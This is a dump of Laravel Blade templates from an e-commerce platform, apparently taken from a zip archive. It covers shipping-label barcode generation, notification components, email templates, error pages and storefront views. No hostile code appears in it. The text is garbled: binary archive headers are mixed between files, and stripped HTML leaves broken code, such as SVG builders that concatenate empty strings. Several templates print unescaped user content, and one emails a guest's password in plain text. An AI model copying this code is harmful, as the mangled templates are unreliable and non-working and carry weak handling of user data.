'*'=>'221312','+'=>'231212',','=>'112232','-'=>'122132','.'=>'122231', '/'=>'113222','0'=>'123122','1'=>'123221','2'=>'223211','3'=>'221132', '4'=>'221231','5'=>'213212','6'=>'223112','7'=>'312131','8'=>'311222', '9'=>'321122',':'=>'321221',';'=>'312212','<'=>'322112','='=>'322211', '>'=>'212123','?'=>'212321','@'=>'232121','A'=>'111323','B'=>'131123', 'C'=>'131321','D'=>'112313','E'=>'132113','F'=>'132311','G'=>'211313', 'H'=>'231113','I'=>'231311','J'=>'112133','K'=>'112331','L'=>'132131', 'M'=>'113123','N'=>'113321','O'=>'133121','P'=>'313121','Q'=>'211331', 'R'=>'231131','S'=>'213113','T'=>'213311','U'=>'213131','V'=>'311123', 'W'=>'311321','X'=>'331121','Y'=>'312113','Z'=>'312311','['=>'332111', '\\'=>'314111',']'=>'221411','^'=>'431111','_'=>'111224','`'=>'111422', 'a'=>'121124','b'=>'121421','c'=>'141122','d'=>'141221','e'=>'112214', 'f'=>'112412','g'=>'122114','h'=>'122411','i'=>'142112','j'=>'142211', 'k'=>'241211','l'=>'221114','m'=>'413111','n'=>'241112','o'=>'134111', 'p'=>'111242','q'=>'121142','r'=>'121241','s'=>'114212','t'=>'124112', 'u'=>'124211','v'=>'411212','w'=>'421112','x'=>'421211','y'=>'212141', 'z'=>'214121','{'=>'412121','|'=>'111143','}'=>'111341','~'=>'131141', ]; $makeSvg = function(string $value, string $type) use ($code39map, $c128map): string { $h = 100; $quiet = 8; $u = 2; $v = strtoupper($value); if ($type === 'code39') { $encoded = '*' . $v . '*'; $bars = []; $x = $quiet; foreach (str_split($encoded) as $ci => $ch) { if (!isset($code39map[$ch])) continue; if ($ci > 0) $x += $u; foreach (str_split($code39map[$ch]) as $bi => $bit) { $w = ($bit === '1') ? $u * 2 + 1 : $u; if ($bi % 2 === 0) $bars[] = ['x' => $x, 'w' => $w]; $x += $w; } } $tw = $x + $quiet; $r = ''; foreach ($bars as $b) $r .= ""; return "{$r}"; } if ($type === 'code128') { $bars = []; $x = $quiet; $isBar = true; $dp = function(string $pat) use (&$bars, &$x, &$isBar, $u, $h) { foreach (str_split($pat) as $d) { $w = (int)$d * $u; if ($isBar && $w > 0) $bars[] = ['x' => $x, 'w' => $w]; $x += $w; $isBar = !$isBar; } }; $dp('2114'); $ck = 104; foreach (str_split($value) as $idx => $ch) { $ck += ($idx + 1) * (ord($ch) - 32); if (isset($c128map[$ch])) $dp($c128map[$ch]); } $ck %= 103; $cc = chr($ck + 32); if (isset($c128map[$cc])) $dp($c128map[$cc]); $dp('2331112'); $tw = $x + $quiet; $r = ''; foreach ($bars as $b) $r .= ""; return "{$r}"; } return "{$value}"; }; @endphp
    @if($logo) @else @endif
    {{ get_setting('site_name') }}
    @if(!empty($flds['order_number']))
    {{ $order->code }}
    @endif
    @if($btype === 'qrcode') {!! str_replace($removedXML, '', QrCode::size(30)->generate($bval)) !!} @else {!! $makeSvg($bval, $btype) !!} @endif @if($showTxt)
    {{ $bval }}
    @endif
    @if($showQR && $btype !== 'qrcode') @endif
    {!! str_replace($removedXML, '', QrCode::size(68)->generate($bval)) !!}
    @if(!empty($flds['order_number'])) @endif @if($order->shipping_type) @endif @if(!empty($flds['sender_name_and_address'])) @endif
    INVOICE : {{ $order->code }}
    D. Type : @if($order->shipping_type == 'home_delivery') Home @elseif($order->shipping_type == 'pickup_point') Pickup @elseif($order->shipping_type == 'carrier') {{ $order->carrier->name ?? 'Carrier' }} @else N/A @endif
    From : {{ $sender_name }}
    Address : {{ get_seller_address($order) }}
    @if(!empty($flds['receiver_name_and_address']))
    {{ $shipping->name }}
    @if(!empty($shipping->phone))
    {{ translate('Phone') }}: {{ $shipping->phone }}
    @endif
    {{ translate('Address') }}: {{ $shipping->address ? $shipping->address.', ' : '' }}{{ $shipping->city ? $shipping->city.', ' : '' }}{{ !empty($shipping->state) ? $shipping->state.', ' : '' }}{{ $shipping->postal_code ?? '' }}{{ $shipping->country ? ', '.$shipping->country : '' }}
    @endif @if(!empty($flds['cod_amount']))
    @if ($order->payment_type == 'cash_on_delivery') @else @endif
    COD {{ single_price($order->grand_total) }} PAID
    @endif
    @if(!empty($flds['custom_footer_text']) && !empty($sl['custom_footer_text']))
    @endif
    PK�N]��e�I�I<views/backend/shipping_labels/shipping_label_small.blade.phpnu�[��� Shipping Label - {{ $order->code }}
    @php $sl = json_decode(get_setting('shipping_label'), true) ?? []; $flds = $sl['fields'] ?? []; $btype = $sl['barcode_type'] ?? 'qrcode'; $bencode = $sl['barcode_encode'] ?? 'order_number'; $showTxt = $sl['show_human_readable_text_below_barcode'] ?? 0; $showQR = $sl['show_qr_code_alongside_barcode'] ?? 0; $sender_name_and_address = $sl['sender_name_and_address'] ?? 0; $show_tracking_code = $flds['show_tracking_code'] ?? 0; $logo = $sl['label_logo'] ?? null; $shipping = json_decode($order->shipping_address); if ($bencode == 'custom_value') $bval = $sl['custom_barcode_value'] ?? $order->code; elseif ($bencode == 'tracking_code') $bval = $order->tracking_code; else $bval = $order->code; $sender_name = $order->shop->name ?? get_setting('site_name'); $removedXML = ''; $code39map = [ '0'=>'101001101101','1'=>'110100101011','2'=>'101100101011', '3'=>'110110010101','4'=>'101001101011','5'=>'110100110101', '6'=>'101100110101','7'=>'101001011011','8'=>'110100101101', '9'=>'101100101101','A'=>'110101001011','B'=>'101101001011', 'C'=>'110110100101','D'=>'101011001011','E'=>'110101100101', 'F'=>'101101100101','G'=>'101010011011','H'=>'110101001101', 'I'=>'101101001101','J'=>'101011001101','K'=>'110101010011', 'L'=>'101101010011','M'=>'110110101001','N'=>'101011010011', 'O'=>'110101101001','P'=>'101101101001','Q'=>'101010110011', 'R'=>'110101011001','S'=>'101101011001','T'=>'101011011001', 'U'=>'110010101011','V'=>'100110101011','W'=>'110011010101', 'X'=>'100101101011','Y'=>'110010110101','Z'=>'100110110101', '-'=>'100101011011','.'=>'110010101101',' '=>'100110101101', '$'=>'100100100101','/'=>'100100101001','+'=>'100101001001', '%'=>'101001001001','*'=>'100101101101', ]; $c128map = [ ' '=>'212222','!'=>'222122','"'=>'222221','#'=>'121223','$'=>'121322', '%'=>'131222','&'=>'122213',"'"=>'122312','('=>'132212',')'=>'221213', '*'=>'221312','+'=>'231212',','=>'112232','-'=>'122132','.'=>'122231', '/'=>'113222','0'=>'123122','1'=>'123221','2'=>'223211','3'=>'221132', '4'=>'221231','5'=>'213212','6'=>'223112','7'=>'312131','8'=>'311222', '9'=>'321122',':'=>'321221',';'=>'312212','<'=>'322112','='=>'322211', '>'=>'212123','?'=>'212321','@'=>'232121','A'=>'111323','B'=>'131123', 'C'=>'131321','D'=>'112313','E'=>'132113','F'=>'132311','G'=>'211313', 'H'=>'231113','I'=>'231311','J'=>'112133','K'=>'112331','L'=>'132131', 'M'=>'113123','N'=>'113321','O'=>'133121','P'=>'313121','Q'=>'211331', 'R'=>'231131','S'=>'213113','T'=>'213311','U'=>'213131','V'=>'311123', 'W'=>'311321','X'=>'331121','Y'=>'312113','Z'=>'312311','['=>'332111', '\\'=>'314111',']'=>'221411','^'=>'431111','_'=>'111224','`'=>'111422', 'a'=>'121124','b'=>'121421','c'=>'141122','d'=>'141221','e'=>'112214', 'f'=>'112412','g'=>'122114','h'=>'122411','i'=>'142112','j'=>'142211', 'k'=>'241211','l'=>'221114','m'=>'413111','n'=>'241112','o'=>'134111', 'p'=>'111242','q'=>'121142','r'=>'121241','s'=>'114212','t'=>'124112', 'u'=>'124211','v'=>'411212','w'=>'421112','x'=>'421211','y'=>'212141', 'z'=>'214121','{'=>'412121','|'=>'111143','}'=>'111341','~'=>'131141', ]; $makeSvg = function(string $value, string $type) use ($code39map, $c128map): string { $h = 100; $quiet = 8; $u = 2; $v = strtoupper($value); if ($type === 'code39') { $encoded = '*' . $v . '*'; $bars = []; $x = $quiet; foreach (str_split($encoded) as $ci => $ch) { if (!isset($code39map[$ch])) continue; if ($ci > 0) $x += $u; foreach (str_split($code39map[$ch]) as $bi => $bit) { $w = ($bit === '1') ? $u * 2 + 1 : $u; if ($bi % 2 === 0) $bars[] = ['x' => $x, 'w' => $w]; $x += $w; } } $tw = $x + $quiet; $r = ''; foreach ($bars as $b) $r .= ""; return "{$r}"; } if ($type === 'code128') { $bars = []; $x = $quiet; $isBar = true; $dp = function(string $pat) use (&$bars, &$x, &$isBar, $u, $h) { foreach (str_split($pat) as $d) { $w = (int)$d * $u; if ($isBar && $w > 0) $bars[] = ['x' => $x, 'w' => $w]; $x += $w; $isBar = !$isBar; } }; $dp('2114'); $ck = 104; foreach (str_split($value) as $idx => $ch) { $ck += ($idx + 1) * (ord($ch) - 32); if (isset($c128map[$ch])) $dp($c128map[$ch]); } $ck %= 103; $cc = chr($ck + 32); if (isset($c128map[$cc])) $dp($c128map[$cc]); $dp('2331112'); $tw = $x + $quiet; $r = ''; foreach ($bars as $b) $r .= ""; return "{$r}"; } return "{$value}"; }; @endphp
    @if($logo) @else @endif
    {{ get_setting('site_name') }}
    @if(!empty($flds['order_number']))
    ORDER ID: {{ $order->code }}
    @endif
    @if($btype === 'qrcode') {!! str_replace($removedXML, '', QrCode::size(50)->generate($bval)) !!} @else {!! $makeSvg($bval, $btype) !!} @endif @if($showTxt)
    {{ $bval }}
    @endif
    @if($showQR && $btype !== 'qrcode') @endif
    {!! str_replace($removedXML, '', QrCode::size(68)->generate($bval)) !!}
    @if(!empty($flds['order_number'])) @endif @if($order->shipping_type) @endif @if(!empty($flds['sender_name_and_address'])) @endif
    INVOICE : {{ $order->code }}
    D. Type : @if($order->shipping_type == 'home_delivery') Home @elseif($order->shipping_type == 'pickup_point') Pickup @elseif($order->shipping_type == 'carrier') {{ $order->carrier->name ?? 'Carrier' }} @else N/A @endif
    From : {{ $sender_name }}
    Address : {{ get_seller_address($order) }}
    @if(!empty($flds['receiver_name_and_address']))
    {{ $shipping->name }}
    @if(!empty($shipping->phone))
    {{ translate('Phone') }}: {{ $shipping->phone }}
    @endif
    {{ translate('Address') }}: {{ $shipping->address ? $shipping->address.', ' : '' }}{{ $shipping->city ? $shipping->city.', ' : '' }}{{ !empty($shipping->state) ? $shipping->state.', ' : '' }}{{ $shipping->postal_code ?? '' }}{{ $shipping->country ? ', '.$shipping->country : '' }}
    @endif @if(!empty($flds['cod_amount']))
    @if($order->payment_type == 'cash_on_delivery') @else @endif
    COD {{ single_price($order->grand_total) }} PAID
    @endif
    @if(!empty($flds['custom_footer_text']) && !empty($sl['custom_footer_text']))
    @endif
    PK�N](���)views/categories/child_category.blade.phpnu�[���@php $value = null; for ($i=0; $i < $child_category->level; $i++){ $value .= '--'; } @endphp @if ($child_category->categories) @foreach ($child_category->categories as $childCategory) @include('categories.child_category', ['child_category' => $childCategory]) @endforeach @endif PK�N]�Ls��'views/components/notification.blade.phpnu�[���@props(['notifications'])
    @php $notificationShowDesign = get_setting('notification_show_type'); if($notificationShowDesign != 'only_text'){ $notifyImageDesign = ''; if($notificationShowDesign == 'design_2'){ $notifyImageDesign = 'rounded-1'; } elseif($notificationShowDesign == 'design_3'){ $notifyImageDesign = 'rounded-circle'; } } @endphp @forelse($notifications as $notification) @php $showNotification = true; if (($notification->type == 'App\Notifications\PreorderNotification') && !addon_is_activated('preorder')) { $showNotification = false; } @endphp @if($showNotification)
  • @php $user_type = auth()->user()->user_type; $notificationType = get_notification_type($notification->notification_type_id, 'id'); $notifyContent = $notificationType->getTranslation('default_text'); @endphp
    @if($notificationShowDesign != 'only_text')
    @endif
    {{-- Order Related Notifications --}} @if ($notification->type == 'App\Notifications\OrderNotification') @php $orderCode = $notification->data['order_code']; $orderId = $notification->data['order_id']; $route = $user_type == 'admin' ? route('all_orders.show', encrypt($orderId)) : route('seller.orders.show', encrypt($orderId)); $orderCode = "".$orderCode.""; $notifyContent = str_replace('[[order_code]]', $orderCode, $notifyContent); @endphp {{-- Shop Verification Related Notifications --}} @elseif ($notification->type == 'App\Notifications\ShopVerificationNotification') @php if($notification->data['status'] == 'submitted'){ $route = route('sellers.show_verification_request', $notification->data['id']); $shopName = "".$notification->data['name'].""; $notifyContent = str_replace('[[shop_name]]', $shopName, $notifyContent); } @endphp {{-- Shop Product Related Notifications --}} @elseif ($notification->type == 'App\Notifications\ShopProductNotification') @php $product_id = $notification->data['id']; $product_type = $notification->data['type']; $lang = env('DEFAULT_LANGUAGE'); $route = $user_type == 'admin' ? ( $product_type == 'physical' ? route('products.seller.edit', ['id'=>$product_id, 'lang'=>$lang]) : route('digitalproducts.edit', ['id'=>$product_id, 'lang'=>$lang] )) : ( $product_type == 'physical' ? route('seller.products.edit', ['id'=>$product_id, 'lang'=>$lang]) : route('seller.digitalproducts.edit', ['id'=>$product_id, 'lang'=>$lang] )); $productName = "".$notification->data['name'].""; $notifyContent = str_replace('[[product_name]]', $productName, $notifyContent); @endphp {{-- Seller Payout Notifications --}} @elseif ($notification->type == 'App\Notifications\PayoutNotification') @php $amount = single_price($notification->data['payment_amount']); $route = $user_type == 'admin' ? ( $notification->data['status'] == 'pending' ? route('withdraw_requests_all') : route('sellers.payment_histories')) : ( $notification->data['status'] == 'pending' ? route('seller.money_withdraw_requests.index') : route('seller.payments.index')); $shopName = "".$notification->data['name'].""; $notifyContent = str_replace('[[shop_name]]', $shopName, $notifyContent); $notifyContent = str_replace('[[amount]]', $amount, $notifyContent); @endphp @elseif (($notification->type == 'App\Notifications\PreorderNotification')) @php $orderCode = $notification->data['order_code']; $orderId = $notification->data['preorder_id']; $route = $user_type == 'admin' ? route('preorder-order.show', encrypt($orderId)) : route('seller.preorder-order.show', encrypt($orderId)); $orderCode = "".$orderCode.""; $notifyContent = str_replace('[[order_code]]', $orderCode, $notifyContent); @endphp @endif

    {!! $notifyContent !!}

    {{ date('F j Y, g:i a', strtotime($notification->created_at)) }}
  • @endif @empty
  • {{ translate('No notification found') }}
  • @endforelse PK�N]�_���.views/components/unread_notification.blade.phpnu�[���@props(['notifications']) @php $notificationShowDesign = get_setting('notification_show_type'); if($notificationShowDesign != 'only_text'){ $notifyImageDesign = ''; if($notificationShowDesign == 'design_2'){ $notifyImageDesign = 'rounded-1'; } elseif($notificationShowDesign == 'design_3'){ $notifyImageDesign = 'rounded-circle'; } } @endphp @forelse($notifications as $notification)
  • @php $user_type = auth()->user()->user_type; $notificationType = get_notification_type($notification->notification_type_id, 'id'); $notifyContent = $notificationType->getTranslation('default_text'); @endphp
    @if($notificationShowDesign != 'only_text')
    @endif
    {{-- Order Related Notifications --}} @if ($notification->type == 'App\Notifications\OrderNotification') @php $orderCode = $notification->data['order_code']; $orderCode = "".$orderCode.""; $notifyContent = str_replace('[[order_code]]', $orderCode, $notifyContent); @endphp {{-- Shop Verification Related Notifications --}} @elseif ($notification->type == 'App\Notifications\ShopVerificationNotification') @php if($notification->data['status'] == 'submitted'){ $shopName = "".$notification->data['name'].""; $notifyContent = str_replace('[[shop_name]]', $shopName, $notifyContent); } @endphp {{-- Shop Product Related Notifications --}} @elseif ($notification->type == 'App\Notifications\ShopProductNotification') @php $product_id = $notification->data['id']; $product_type = $notification->data['type']; $lang = env('DEFAULT_LANGUAGE'); $productName = "".$notification->data['name'].""; $notifyContent = str_replace('[[product_name]]', $productName, $notifyContent); @endphp {{-- Seller Payout Notifications --}} @elseif ($notification->type == 'App\Notifications\PayoutNotification') @php $amount = single_price($notification->data['payment_amount']); $shopName = "".$notification->data['name'].""; $notifyContent = str_replace('[[shop_name]]', $shopName, $notifyContent); $notifyContent = str_replace('[[amount]]', $amount, $notifyContent); @endphp {{-- Preorder Notifications --}} @elseif ($notification->type == 'App\Notifications\PreorderNotification' && addon_is_activated('preorder')) @php $orderCode = $notification->data['order_code']; $orderCode = "".$orderCode.""; $notifyContent = str_replace('[[order_code]]', $orderCode, $notifyContent); @endphp @endif

    {!! $notifyContent !!}

    {{ date('F j Y, g:i a', strtotime($notification->created_at)) }}
  • @empty
  • {{ translate('No notification found') }}
  • @endforelse PK�N]�a�VV'views/emails/app_verification.blade.phpnu�[��� @php $logo = get_setting('header_logo'); @endphp
    {{ env('APP_NAME') }}
     
    {{ $array['subject'] }}
    {{ $array['content'] }}
    PK�N]g� mm"views/emails/auction_bid.blade.phpnu�[���

    {{ $content }}

    {{ translate('Change Bid') }}PK�N]�9�d��views/emails/contact.blade.phpnu�[���

    {!! $content !!}

    {{ translate('Name') }}: {{ $name }}
    {{ translate('Email') }}: {{ $email }} @if ($phone != null)
    {{ translate('Phone') }}: {{ $phone }} @endif

    {{ translate('Go to the website') }} PK�N]����#views/emails/conversation.blade.phpnu�[���

    {{ translate('Message') }}

    {{ $content }}

    {{ translate('Sender') }}:{{ $sender }}

    {{ translate('Message') }}:{{ $details }}

    {{ translate('See Details') }} PK�N]Bg0�,,,views/emails/guest_account_opening.blade.phpnu�[���

    {{ translate('Hi! An account has been created on').' '.env('APP_NAME') }}

    {{ translate('Your Email is') }}: {{ $email }}

    {{ translate('Your Password is') }}: {{ $password }}

    {{ translate('Go to the website') }}PK�N][hP��views/emails/index.blade.phpnu�[��� @php $logo = get_setting('header_logo'); @endphp
    {{ env('APP_NAME') }}

    {!! $content !!}

    PK�N]����J�Jviews/emails/invoice.blade.phpnu�[��� {{ translate('INVOICE') }}
    @php $logo = get_setting('header_logo'); @endphp @if($logo != null) @else @endif @if($order->order_from == 'pos') {{ translate('POS INVOICE') }} @else {{ translate('INVOICE') }} @endif
    {{ get_setting('site_name') }}
    {{ get_setting('contact_address') }}
    {{ translate('Email') }}: {{ get_setting('contact_email') }}
    {{ translate('Phone') }}: {{ get_setting('contact_phone') }}

    {{ translate('Sold By') }}:
    {{ $order->shop->name ?? get_setting('site_name') }}
    {{ get_seller_address($order) }}

    @php $gstin = get_seller_gstin($order); @endphp @if($gstin && is_numeric($order->orderDetails->first()->gst_amount ?? null))
    {{ translate('GSTIN') }}: {{ $gstin }}

    @endif
    {{ translate('Payment method') }}: {{ translate(ucfirst(str_replace('_', ' ', $order->payment_type))) }}
    {{ translate('Delivery Type') }}: @if ($order->shipping_type == 'home_delivery') {{ translate('Home Delivery') }} @elseif ($order->shipping_type == 'pickup_point') @if ($order->pickup_point) {{ $order->pickup_point->getTranslation('name') }} ({{ translate('Pickup Point') }}) @else {{ translate('Pickup Point') }} @endif @elseif ($order->shipping_type == 'carrier') @if ($order->carrier) {{ $order->carrier->name }} ({{ translate('Carrier') }})
    {{ translate('Transit Time') }} - {{ $order->carrier->transit_time }} @else {{ translate('Carrier') }} @endif @else {{ translate('N/A') }} @endif
    {{ translate('Order ID') }}: {{ $order->code }}
    {{ translate('Order Date') }}: {{ date('d-m-Y', $order->date) }}

    @php $billing = json_decode($order->billing_address) ?? json_decode($order->shipping_address); $shipping = json_decode($order->shipping_address); @endphp @if(!empty($billing->email)) @endif @if(!empty($billing->phone)) @endif
    {{ translate('Bill to') }}:
    {{ $billing->name }}
    {{ $billing->address ?? '' }}{{ $billing->address ? ', ' : '' }} {{ $billing->city ?? '' }}{{ $billing->city ? ', ' : '' }} {{ $billing->state ?? '' }}{{ !empty($billing->state) ? ' - ' : '' }} {{ $billing->postal_code ?? '' }}{{ $billing->postal_code ? ', ' : '' }} {{ $billing->country ?? '' }}
    {{ translate('Email') }}: {{ $billing->email }}
    {{ translate('Phone') }}: {{ $billing->phone }}

    @if(!empty($shipping->email)) @endif @if(!empty($shipping->phone)) @endif
    {{ translate('Ship to') }}:
    {{ $shipping->name }}
    {{ $shipping->address ?? '' }}{{ $shipping->address ? ', ' : '' }} {{ $shipping->city ?? '' }}{{ $shipping->city ? ', ' : '' }} {{ $shipping->state ?? '' }}{{ !empty($shipping->state) ? ' - ' : '' }} {{ $shipping->postal_code ?? '' }}{{ $shipping->postal_code ? ', ' : '' }} {{ $shipping->country ?? '' }}
    {{ translate('Email') }}: {{ $shipping->email }}
    {{ translate('Phone') }}: {{ $shipping->phone }}
    @if(is_numeric($order->orderDetails->first()->gst_amount ?? null)) @if(same_state_shipping($order)) @else @endif @else @endif @foreach ($order->orderDetails as $orderDetail) @if ($orderDetail->product != null) @if(is_numeric($orderDetail->gst_amount ?? null)) @php $taxable = $orderDetail->price - ($orderDetail->coupon_discount ?? 0); $gst_amount = get_gst_by_price_and_rate($taxable, $orderDetail->gst_rate); $shipping_gst = get_gst_by_price_and_rate($orderDetail->shipping_cost, $orderDetail->gst_rate); @endphp @if(same_state_shipping($order)) @else @endif @else @endif @if(is_numeric($orderDetail->gst_amount ?? null)) @else @endif @if(is_numeric($orderDetail->gst_amount ?? null)) @if(same_state_shipping($order)) @else @endif @endif @endif @endforeach
    {{ translate('Product Name') }} {{ translate('Qty') }}{{ translate('Gross Amount') }} {{ translate('Discount/Coupon') }} {{ translate('Taxable Value') }}{{ translate('CGST') }} {{ translate('SGST') }}{{ translate('IGST') }}{{ translate('Unit Price') }} {{ translate('Tax') }}{{ translate('Total') }}
    {{ $orderDetail->product->getTranslation('name') }} @if($orderDetail->variation) ({{ $orderDetail->variation }}) @endif
    {{ translate('SKU') }}: @php $stock = json_decode($orderDetail->product->stocks->first() ?? '{}', true); echo $stock['sku'] ?? 'N/A'; @endphp
    {{ $orderDetail->quantity }}{{ single_price($orderDetail->price) }} {{ single_price($orderDetail->coupon_discount ?? 0) }} {{ single_price($orderDetail->price - ($orderDetail->coupon_discount ?? 0)) }}{{ single_price($gst_amount / 2) }} {{ single_price($gst_amount / 2) }}{{ single_price($gst_amount) }}{{ single_price($orderDetail->price / $orderDetail->quantity) }} {{ single_price($orderDetail->tax / $orderDetail->quantity) }} {{ single_price($orderDetail->price - ($orderDetail->coupon_discount ?? 0) + $gst_amount) }} {{ single_price($orderDetail->price + $orderDetail->tax) }}
    {{ translate('Shipping') }} 1 {{ single_price($orderDetail->shipping_cost) }} {{ single_price(0) }} {{ single_price($orderDetail->shipping_cost) }}{{ single_price($shipping_gst / 2) }} {{ single_price($shipping_gst / 2) }}{{ single_price($shipping_gst) }} {{ single_price($orderDetail->shipping_cost + $shipping_gst) }}
    {!! str_replace('', '', QrCode::size(100)->generate($order->code)) !!} @if(is_numeric($order->orderDetails->first()->gst_amount ?? null)) @else @endif
    {{ translate('Sub Total') }} {{ single_price($order->orderDetails->sum('price') + $order->orderDetails->sum('shipping_cost') - $order->orderDetails->sum('coupon_discount')) }}
    {{ translate('Total GST') }} {{ single_price($order->orderDetails->sum('gst_amount')) }}
    {{ translate('Sub Total') }} {{ single_price($order->orderDetails->sum('price')) }}
    {{ translate('Shipping Cost') }} {{ single_price($order->orderDetails->sum('shipping_cost')) }}
    {{ translate('Total Tax') }} {{ single_price($order->orderDetails->sum('tax')) }}
    {{ translate('Coupon Discount') }} {{ single_price($order->coupon_discount) }}
    {{ translate('Grand Total') }} {{ single_price($order->grand_total) }}
    PK�N]1�e''!views/emails/newsletter.blade.phpnu�[���@php echo $array['content']; @endphpPK�N]�4  views/emails/support.blade.phpnu�[���

    {{ translate('Ticket') }}

    {{ $content }}

    {{ translate('Sender') }}: {{ $sender }}

    {{ translate('Details') }}:
    @php echo $details; @endphp

    {{ translate('See ticket') }} PK�N]`�VFmm#views/emails/verification.blade.phpnu�[��� @php $logo = get_setting('header_logo'); @endphp
    {{ env('APP_NAME') }}
     
    @if(!empty( $array['link'])) @endif
    {{ $array['subject'] }}
    {{ $array['content'] }}
    {{ translate("Click Here") }}
    PK�N]ME1��views/errors/403.blade.phpnu�[���@extends('frontend.layouts.app') @section('content')

    {{ translate('Access Denined!') }}

    {{ translate("You Do not Have The Right Permission To Access.") }}

    @endsection PK�N]h���vvviews/errors/404.blade.phpnu�[���@php $layout = 'frontend.layouts.app'; if (addon_is_activated('portfolio_system')) { $user = auth()->user(); if ( !$user || $user->verification_status == 0 || optional($user->shop)->verification_status == 0 ) { $layout = 'frontend.layouts.portfolio_app'; } } @endphp @extends($layout) @section('content')

    {{ translate('Page Not Found!') }}

    {{ translate('The page you are looking for has not been found on our server.') }}

    @endsection PK�N]�9D��views/errors/500.blade.phpnu�[���@php $layout = 'frontend.layouts.app'; if (addon_is_activated('portfolio_system')) { $user = auth()->user(); if ( !$user || $user->verification_status == 0 || optional($user->shop)->verification_status == 0 ) { $layout = 'frontend.layouts.portfolio_app'; } } @endphp @extends($layout) @section('content')

    {{ translate("Something went wrong!") }}

    {{ translate("Sorry for the inconvenience, but we're working on it.") }}
    {{ translate("Error code") }}: 500

    @endsection PK�N]��Pviews/errors/503.blade.phpnu�[���@extends('backend.layouts.layout') @section('content')

    {{translate('We are Under Maintenance.')}}

    {{translate('We will be back soon!')}}
    @endsection PK�N]`��CC"views/frontend/all_brand.blade.phpnu�[���@extends('frontend.layouts.app') @section('content')

    {{ translate('All Brands') }}

    @foreach ($brands as $brand) @endforeach
    @endsection PK�N]�t�+NN%views/frontend/all_category.blade.phpnu�[���@extends('frontend.layouts.app') @section('content')

    {{ translate('All Categories') }}

    @foreach ($categories as $key => $category)
    {{ $category->getTranslation('name') }}
    @foreach ($category->childrenCategories as $key => $child_category)
    {{ $child_category->getTranslation('name') }}
    @if ($child_category->childrenCategories->count() > 5) {{ translate('More') }} @endif
    @endforeach
    @endforeach
    @endsection @section('script') @endsection PK�N]a���$$*views/frontend/authorize_net/pay.blade.phpnu�[���@extends('frontend.layouts.app') @section('content') @php $months = array(1 => 'Jan', 2 => 'Feb', 3 => 'Mar', 4 => 'Apr', 5 => 'May', 6 => 'Jun', 7 => 'Jul', 8 => 'Aug', 9 => 'Sep', 10 => 'Oct', 11 => 'Nov', 12 => 'Dec'); @endphp
    @if(session('success_msg'))
    {{ session('success_msg') }}
    @endif @if(session('error_msg'))
    {{ session('error_msg') }}
    @endif

    Payment

    @csrf
    Please enter Owner Card name
    Please enter cvv
    Please enter valid card number


    @endsectionPK�N]�"Yqq%views/frontend/best_selling.blade.phpnu�[���@extends('frontend.layouts.app') @section('content')

    {{$title}} {{ translate('Products') }}

    @foreach ($best_selling_products as $key => $product)
    @include('frontend.'.get_setting('homepage_select').'.partials.product_box_1',['product' => $product])
    @endforeach
    @if(isset($has_pagination))
    {{ $best_selling_products->links() }}
    @endif
    @endsection PK�N]h/�P��#views/frontend/bkash/fail.blade.phpnu�[���@extends('frontend.layouts.app') @section('content')
    @if(isset($errorMessage))

    {{ $errorMessage }}

    @endif
    @endsection PK�N]u�{��%views/frontend/blog/details.blade.phpnu�[���@extends('frontend.layouts.app') @section('meta_title'){{ $blog->meta_title }}@stop @section('meta_description'){{ $blog->meta_description }}@stop @section('meta_keywords'){{ $blog->meta_keywords }}@stop @section('meta') @endsection @section('content')

    slug }}" class="text-reset hov-text-primary" title="{{ $blog->title }}"> {{ $blog->title }}

    {{ date('M d, Y',strtotime($blog->created_at)) }}
    @if($blog->category != null)
    {{ $blog->category->category_name }}
    @endif
    {{ $blog->title }}
    {!! $blog->description !!}
    @if (get_setting('facebook_comment') == 1)
    slug) }}" data-width="" data-numposts="5">
    @endif

    {{ translate('Recent Posts') }}

    @foreach($recent_blogs as $recent_blog)

    slug }}" class="text-reset hov-text-primary" title="{{ $recent_blog->title }}"> {{ $recent_blog->title }}

    {{ date('M d, Y',strtotime($recent_blog->created_at)) }}
    @if($recent_blog->category != null)
    {{ $recent_blog->category->category_name }}
    @endif
    @endforeach
    @endsection @section('script') @if (get_setting('facebook_comment') == 1)
    @endif @endsectionPK�N]ߵ�'z*z*%views/frontend/blog/listing.blade.phpnu�[���@extends('frontend.layouts.app') @section('content')

    {{ translate('Blogs')}}

    @foreach($blogs as $blog) @endforeach
    {{ $blogs->links() }}

    {{ translate('Recent Posts') }}

    @foreach($recent_blogs as $recent_blog)

    slug }}" class="text-reset hov-text-primary" title="{{ $recent_blog->title }}"> {{ $recent_blog->title }}

    {{ date('M d, Y',strtotime($recent_blog->created_at)) }}
    @if($recent_blog->category != null)
    {{ $recent_blog->category->category_name }}
    @endif
    @endforeach
    @endsection @section('script') @endsection PK�N]�;�0��!views/frontend/checkout.blade.phpnu�[���@extends('frontend.layouts.app') @section('content')
    @csrf
    {{ translate('Shipping Info') }}
    @include('frontend.partials.cart.shipping_info', ['address_id' => $address_id])
    {{ translate('Delivery Info') }}
    @include('frontend.partials.cart.delivery_info', ['carts' => $carts, 'carrier_list' => $carrier_list, 'shipping_info' => $shipping_info])
    {{ translate('Payment') }}
    @include('frontend.partials.cart.payment_info', ['carts' => $carts, 'total' => $total])
    @include('frontend.partials.cart.cart_summary', ['proceed' => 0, 'carts' => $carts])
    @endsection @section('modal') @if(Auth::check()) @include('frontend.partials.address.address_modal') @include('frontend.partials.address.billing_address_modal') @endif @if(auth()->check() && addon_is_activated('otp_system') && auth()->user()->otp_activation_purchase_cod_wallet == 1) @include('otp_systems.frontend.modal_cod_wallet_otp') @endif @endsection @section('script') @include('frontend.partials.address.address_js') @if(get_active_countries()->count() == 1) @endif @if (get_setting('google_map') == 1) @include('frontend.partials.google_map') @endif @endsection PK�N]:@R�R�&views/frontend/classic/index.blade.phpnu�[���@extends('frontend.layouts.app') @section('content') @php $lang = get_system_language()->code; @endphp
    @include('frontend.' . get_setting('homepage_select') . '.partials.category_menu')
    @if (get_setting('home_slider_images', null, $lang) != null) @endif
    @php $flash_deal = get_featured_flash_deal(); @endphp @if ($flash_deal != null)
    Ends in: 00 days 00 hrs 00 min 00 sec
    @php $flash_deal_products = get_flash_deal_products($flash_deal->id); @endphp
    @endif
    @if (count($featured_categories) > 0)

    {{ translate('Featured Categories') }}

    @foreach ($featured_categories->take(6) as $key => $category) @php $category_name = $category->getTranslation('name'); @endphp
    {{ $category->getTranslation('name') }}
    {{ $category_name }}
    @foreach ($category->childrenCategories->take(5) as $child_category)

    {{ $child_category->getTranslation('name') }}

    @endforeach
    @endforeach
